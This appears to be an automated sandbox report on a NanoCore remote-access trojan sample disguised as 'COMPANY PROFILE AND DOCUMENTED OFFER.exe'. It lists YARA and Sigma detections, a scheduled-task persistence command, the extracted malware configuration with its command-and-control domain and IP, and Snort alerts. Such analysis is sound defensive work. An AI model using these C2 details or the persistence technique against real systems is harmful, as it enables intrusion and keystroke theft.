0.2.COMPANY PROFILE AND DOCUMENTED OFFER.exe.40cf9c0.4.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.2.COMPANY PROFILE AND DOCUMENTED OFFER.exe.40cf9c0.4.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
0.2.COMPANY PROFILE AND DOCUMENTED OFFER.exe.40cf9c0.4.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.2.COMPANY PROFILE AND DOCUMENTED OFFER.exe.40cf9c0.4.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
14.2.dhcpmon.exe.3daff4c.4.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0x28269:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost 0x28296:$x2: IClientNetworkHost
14.2.dhcpmon.exe.3daff4c.4.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x28269:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0x29344:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost 0x28283:$s5: IClientLoggingHost
14.2.dhcpmon.exe.3daff4c.4.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
14.2.dhcpmon.exe.3dab116.5.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0x145e3:$x1: NanoCore.ClientPluginHost 0x2d09f:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost 0x14610:$x2: IClientNetworkHost 0x2d0cc:$x2: IClientNetworkHost
14.2.dhcpmon.exe.3dab116.5.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x145e3:$x2: NanoCore.ClientPluginHost 0x2d09f:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0x156be:$s4: PipeCreated 0x2e17a:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost 0x145fd:$s5: IClientLoggingHost 0x2d0b9:$s5: IClientLoggingHost
14.2.dhcpmon.exe.3dab116.5.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
14.2.dhcpmon.exe.3dab116.5.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xddf:$a: NanoCore 0xe38:$a: NanoCore 0xe75:$a: NanoCore 0xeee:$a: NanoCore 0x14599:$a: NanoCore 0x145ae:$a: NanoCore 0x145e3:$a: NanoCore 0x2d055:$a: NanoCore 0x2d06a:$a: NanoCore 0x2d09f:$a: NanoCore 0xe41:$b: ClientPlugin 0xe7e:$b: ClientPlugin 0x177c:$b: ClientPlugin 0x1789:$b: ClientPlugin 0x14355:$b: ClientPlugin 0x14370:$b: ClientPlugin 0x143a0:$b: ClientPlugin 0x145b7:$b: ClientPlugin 0x145ec:$b: ClientPlugin 0x2ce11:$b: ClientPlugin 0x2ce2c:$b: ClientPlugin
7.3.COMPANY PROFILE AND DOCUMENTED OFFER.exe.4b0a6a5.0.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2205:$a: NanoCore 0x227f:$a: NanoCore 0x6e1c:$a: NanoCore 0x81d6:$a: NanoCore 0x8220:$a: NanoCore 0x8e7a:$a: NanoCore 0x11c42:$a: NanoCore 0x11d2c:$a: NanoCore 0x12ba3:$a: NanoCore 0x1bd4d:$a: NanoCore 0x1bdae:$a: NanoCore 0x1bdf1:$a: NanoCore 0x1be31:$a: NanoCore 0x1c06d:$a: NanoCore 0x1c10d:$a: NanoCore 0x1c8e5:$a: NanoCore 0x1ced8:$a: NanoCore 0x1d029:$a: NanoCore 0x1de83:$a: NanoCore 0x1e0ea:$a: NanoCore 0x1e0ff:$a: NanoCore
7.3.COMPANY PROFILE AND DOCUMENTED OFFER.exe.4b04c79.1.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x142b:$a: NanoCore 0x1484:$a: NanoCore 0x14b7:$a: NanoCore 0x16e3:$a: NanoCore 0x175f:$a: NanoCore 0x1d78:$a: NanoCore 0x1ec1:$a: NanoCore 0x2395:$a: NanoCore 0x267c:$a: NanoCore 0x2693:$a: NanoCore 0x7c31:$a: NanoCore 0x7cab:$a: NanoCore 0xc848:$a: NanoCore 0xdc02:$a: NanoCore 0xdc4c:$a: NanoCore 0xe8a6:$a: NanoCore 0x1766e:$a: NanoCore 0x17758:$a: NanoCore 0x185cf:$a: NanoCore 0x21779:$a: NanoCore 0x217da:$a: NanoCore
7.3.COMPANY PROFILE AND DOCUMENTED OFFER.exe.4af064e.2.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x8b7f:$a: NanoCore 0x8ba5:$a: NanoCore 0x8c01:$a: NanoCore 0x15a56:$a: NanoCore 0x15aaf:$a: NanoCore 0x15ae2:$a: NanoCore 0x15d0e:$a: NanoCore 0x15d8a:$a: NanoCore 0x163a3:$a: NanoCore 0x164ec:$a: NanoCore 0x169c0:$a: NanoCore 0x16ca7:$a: NanoCore 0x16cbe:$a: NanoCore 0x1c25c:$a: NanoCore 0x1c2d6:$a: NanoCore 0x20e73:$a: NanoCore 0x2222d:$a: NanoCore 0x22277:$a: NanoCore 0x22ed1:$a: NanoCore 0x2bc99:$a: NanoCore 0x2bd83:$a: NanoCore
Click to see the 39 entries

Sigma Overview

System Summary:

Sigma detected: NanoCore

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe, ProcessId: 5980, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

Sigma detected: Scheduled temp file as task from temp location

Show sources

Source: Process started

Author: Joe Security: Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\sjZXfoyePbSa' /XML 'C:\Users\user\AppData\Local\Temp\tmp66DE.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\sjZXfoyePbSa' /XML 'C:\Users\user\AppData\Local\Temp\tmp66DE.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe' , ParentImage: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe, ParentProcessId: 7052, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\sjZXfoyePbSa' /XML 'C:\Users\user\AppData\Local\Temp\tmp66DE.tmp', ProcessId: 64

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 0000000E.00000002.739970896.0000000003D69000.00000004.00000001.sdmp

Malware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "6f656d69-7475-8807-1300-00", "Group": "worker", "Domain1": "", "Domain2": "hailongfvt.zapto.org", "Port": 3365, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000008.00000002.726986309.000000000410C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.673686712.000000000408C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.739875552.0000000002D61000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.737080835.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.739970896.0000000003D69000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dhcpmon.exe PID: 6052, type: MEMORY
Source: Yara match	File source: Process Memory Space: COMPANY PROFILE AND DOCUMENTED OFFER.exe PID: 7052, type: MEMORY
Source: Yara match	File source: Process Memory Space: dhcpmon.exe PID: 6848, type: MEMORY
Source: Yara match	File source: 14.2.dhcpmon.exe.3db4575.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.dhcpmon.exe.3daff4c.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.dhcpmon.exe.414f9c0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.COMPANY PROFILE AND DOCUMENTED OFFER.exe.40cf9c0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.dhcpmon.exe.414f9c0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.COMPANY PROFILE AND DOCUMENTED OFFER.exe.40cf9c0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.dhcpmon.exe.3daff4c.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.dhcpmon.exe.3dab116.5.raw.unpack, type: UNPACKEDPE

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\sjZXfoyePbSa.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Show sources

Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe

Joe Sandbox ML: detected

Source: 14.2.dhcpmon.exe.400000.0.unpack

Avira: Label: TR/Dropper.MSIL.Gen7

Compliance:

Uses 32bit PE files

Show sources

Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Contains modern PE file flags such as dynamic base (ASLR) or NX

Show sources

Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Binary contains paths to debug symbols

Show sources

Source:	Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000007.00000003.841131844.0000000004AE7000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000007.00000003.841131844.0000000004AE7000.00000004.00000001.sdmp
Source:	Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000007.00000003.841131844.0000000004AE7000.00000004.00000001.sdmp
Source:	Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000007.00000003.841131844.0000000004AE7000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000007.00000003.841131844.0000000004AE7000.00000004.00000001.sdmp

Software Vulnerabilities:

Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h	0_2_090BF910
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h	0_2_090BFC00
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h	8_2_06070040
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h	8_2_071FEFC0
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h	8_2_071FF2F8

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49737 -> 185.140.53.139:3365
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49739 -> 185.140.53.139:3365
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49742 -> 185.140.53.139:3365
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49743 -> 185.140.53.139:3365
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49745 -> 185.140.53.139:3365
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49747 -> 185.140.53.139:3365
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49748 -> 185.140.53.139:3365
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49757 -> 185.140.53.139:3365
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49766 -> 185.140.53.139:3365
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49767 -> 185.140.53.139:3365
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49768 -> 185.140.53.139:3365
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49769 -> 185.140.53.139:3365
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49770 -> 185.140.53.139:3365
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49773 -> 185.140.53.139:3365
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49774 -> 185.140.53.139:3365
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49775 -> 185.140.53.139:3365
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49776 -> 185.140.53.139:3365

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	URLs:
Source: Malware configuration extractor	URLs: hailongfvt.zapto.org

Source: global traffic

TCP traffic: 192.168.2.4:49737 -> 185.140.53.139:3365

Source: Joe Sandbox View

IP Address: 185.140.53.139 185.140.53.139

Source: Joe Sandbox View

ASN Name: DAVID_CRAIGGG DAVID_CRAIGGG

Source: unknown

DNS traffic detected: queries for: hailongfvt.zapto.org

Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000007.00000003.841131844.0000000004AE7000.00000004.00000001.sdmp	String found in binary or memory: http://google.com
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.672841127.0000000002E21000.00000004.00000001.sdmp, dhcpmon.exe, 00000008.00000002.724064551.0000000002F28000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000003.652015213.0000000005E2D000.00000004.00000001.sdmp	String found in binary or memory: http://www.ascendercorp.com/typedesigners.html
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677423373.0000000005DF0000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comm
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677423373.0000000005DF0000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comoH
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000003.648445406.0000000005E0B000.00000004.00000001.sdmp	String found in binary or memory: http://www.fonts.comic
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000003.650357997.0000000005DF6000.00000004.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000003.650357997.0000000005DF6000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cnG
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000003.650357997.0000000005DF6000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cnM
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000003.649882095.0000000005DFD000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cnr
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000003.652891462.0000000005E2D000.00000004.00000001.sdmp	String found in binary or memory: http://www.monotype.
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000003.647611607.0000000005DF3000.00000004.00000001.sdmp, COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000003.647611607.0000000005DF3000.00000004.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.coma
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.672841127.0000000002E21000.00000004.00000001.sdmp, dhcpmon.exe, 00000008.00000002.724064551.0000000002F28000.00000004.00000001.sdmp	String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Source: dhcpmon.exe, 00000008.00000002.721479740.00000000012A8000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: dhcpmon.exe, 0000000E.00000002.739875552.0000000002D61000.00000004.00000001.sdmp

Binary or memory string: RegisterRawInputDevices

E-Banking Fraud:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000008.00000002.726986309.000000000410C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.673686712.000000000408C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.739875552.0000000002D61000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.737080835.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.739970896.0000000003D69000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dhcpmon.exe PID: 6052, type: MEMORY
Source: Yara match	File source: Process Memory Space: COMPANY PROFILE AND DOCUMENTED OFFER.exe PID: 7052, type: MEMORY
Source: Yara match	File source: Process Memory Space: dhcpmon.exe PID: 6848, type: MEMORY
Source: Yara match	File source: 14.2.dhcpmon.exe.3db4575.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.dhcpmon.exe.3daff4c.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.dhcpmon.exe.414f9c0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.COMPANY PROFILE AND DOCUMENTED OFFER.exe.40cf9c0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.dhcpmon.exe.414f9c0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.COMPANY PROFILE AND DOCUMENTED OFFER.exe.40cf9c0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.dhcpmon.exe.3daff4c.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.dhcpmon.exe.3dab116.5.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000008.00000002.726986309.000000000410C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000008.00000002.726986309.000000000410C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000003.841131844.0000000004AE7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000002.673686712.000000000408C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000002.673686712.000000000408C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000E.00000002.739875552.0000000002D61000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000E.00000002.737080835.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000E.00000002.737080835.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
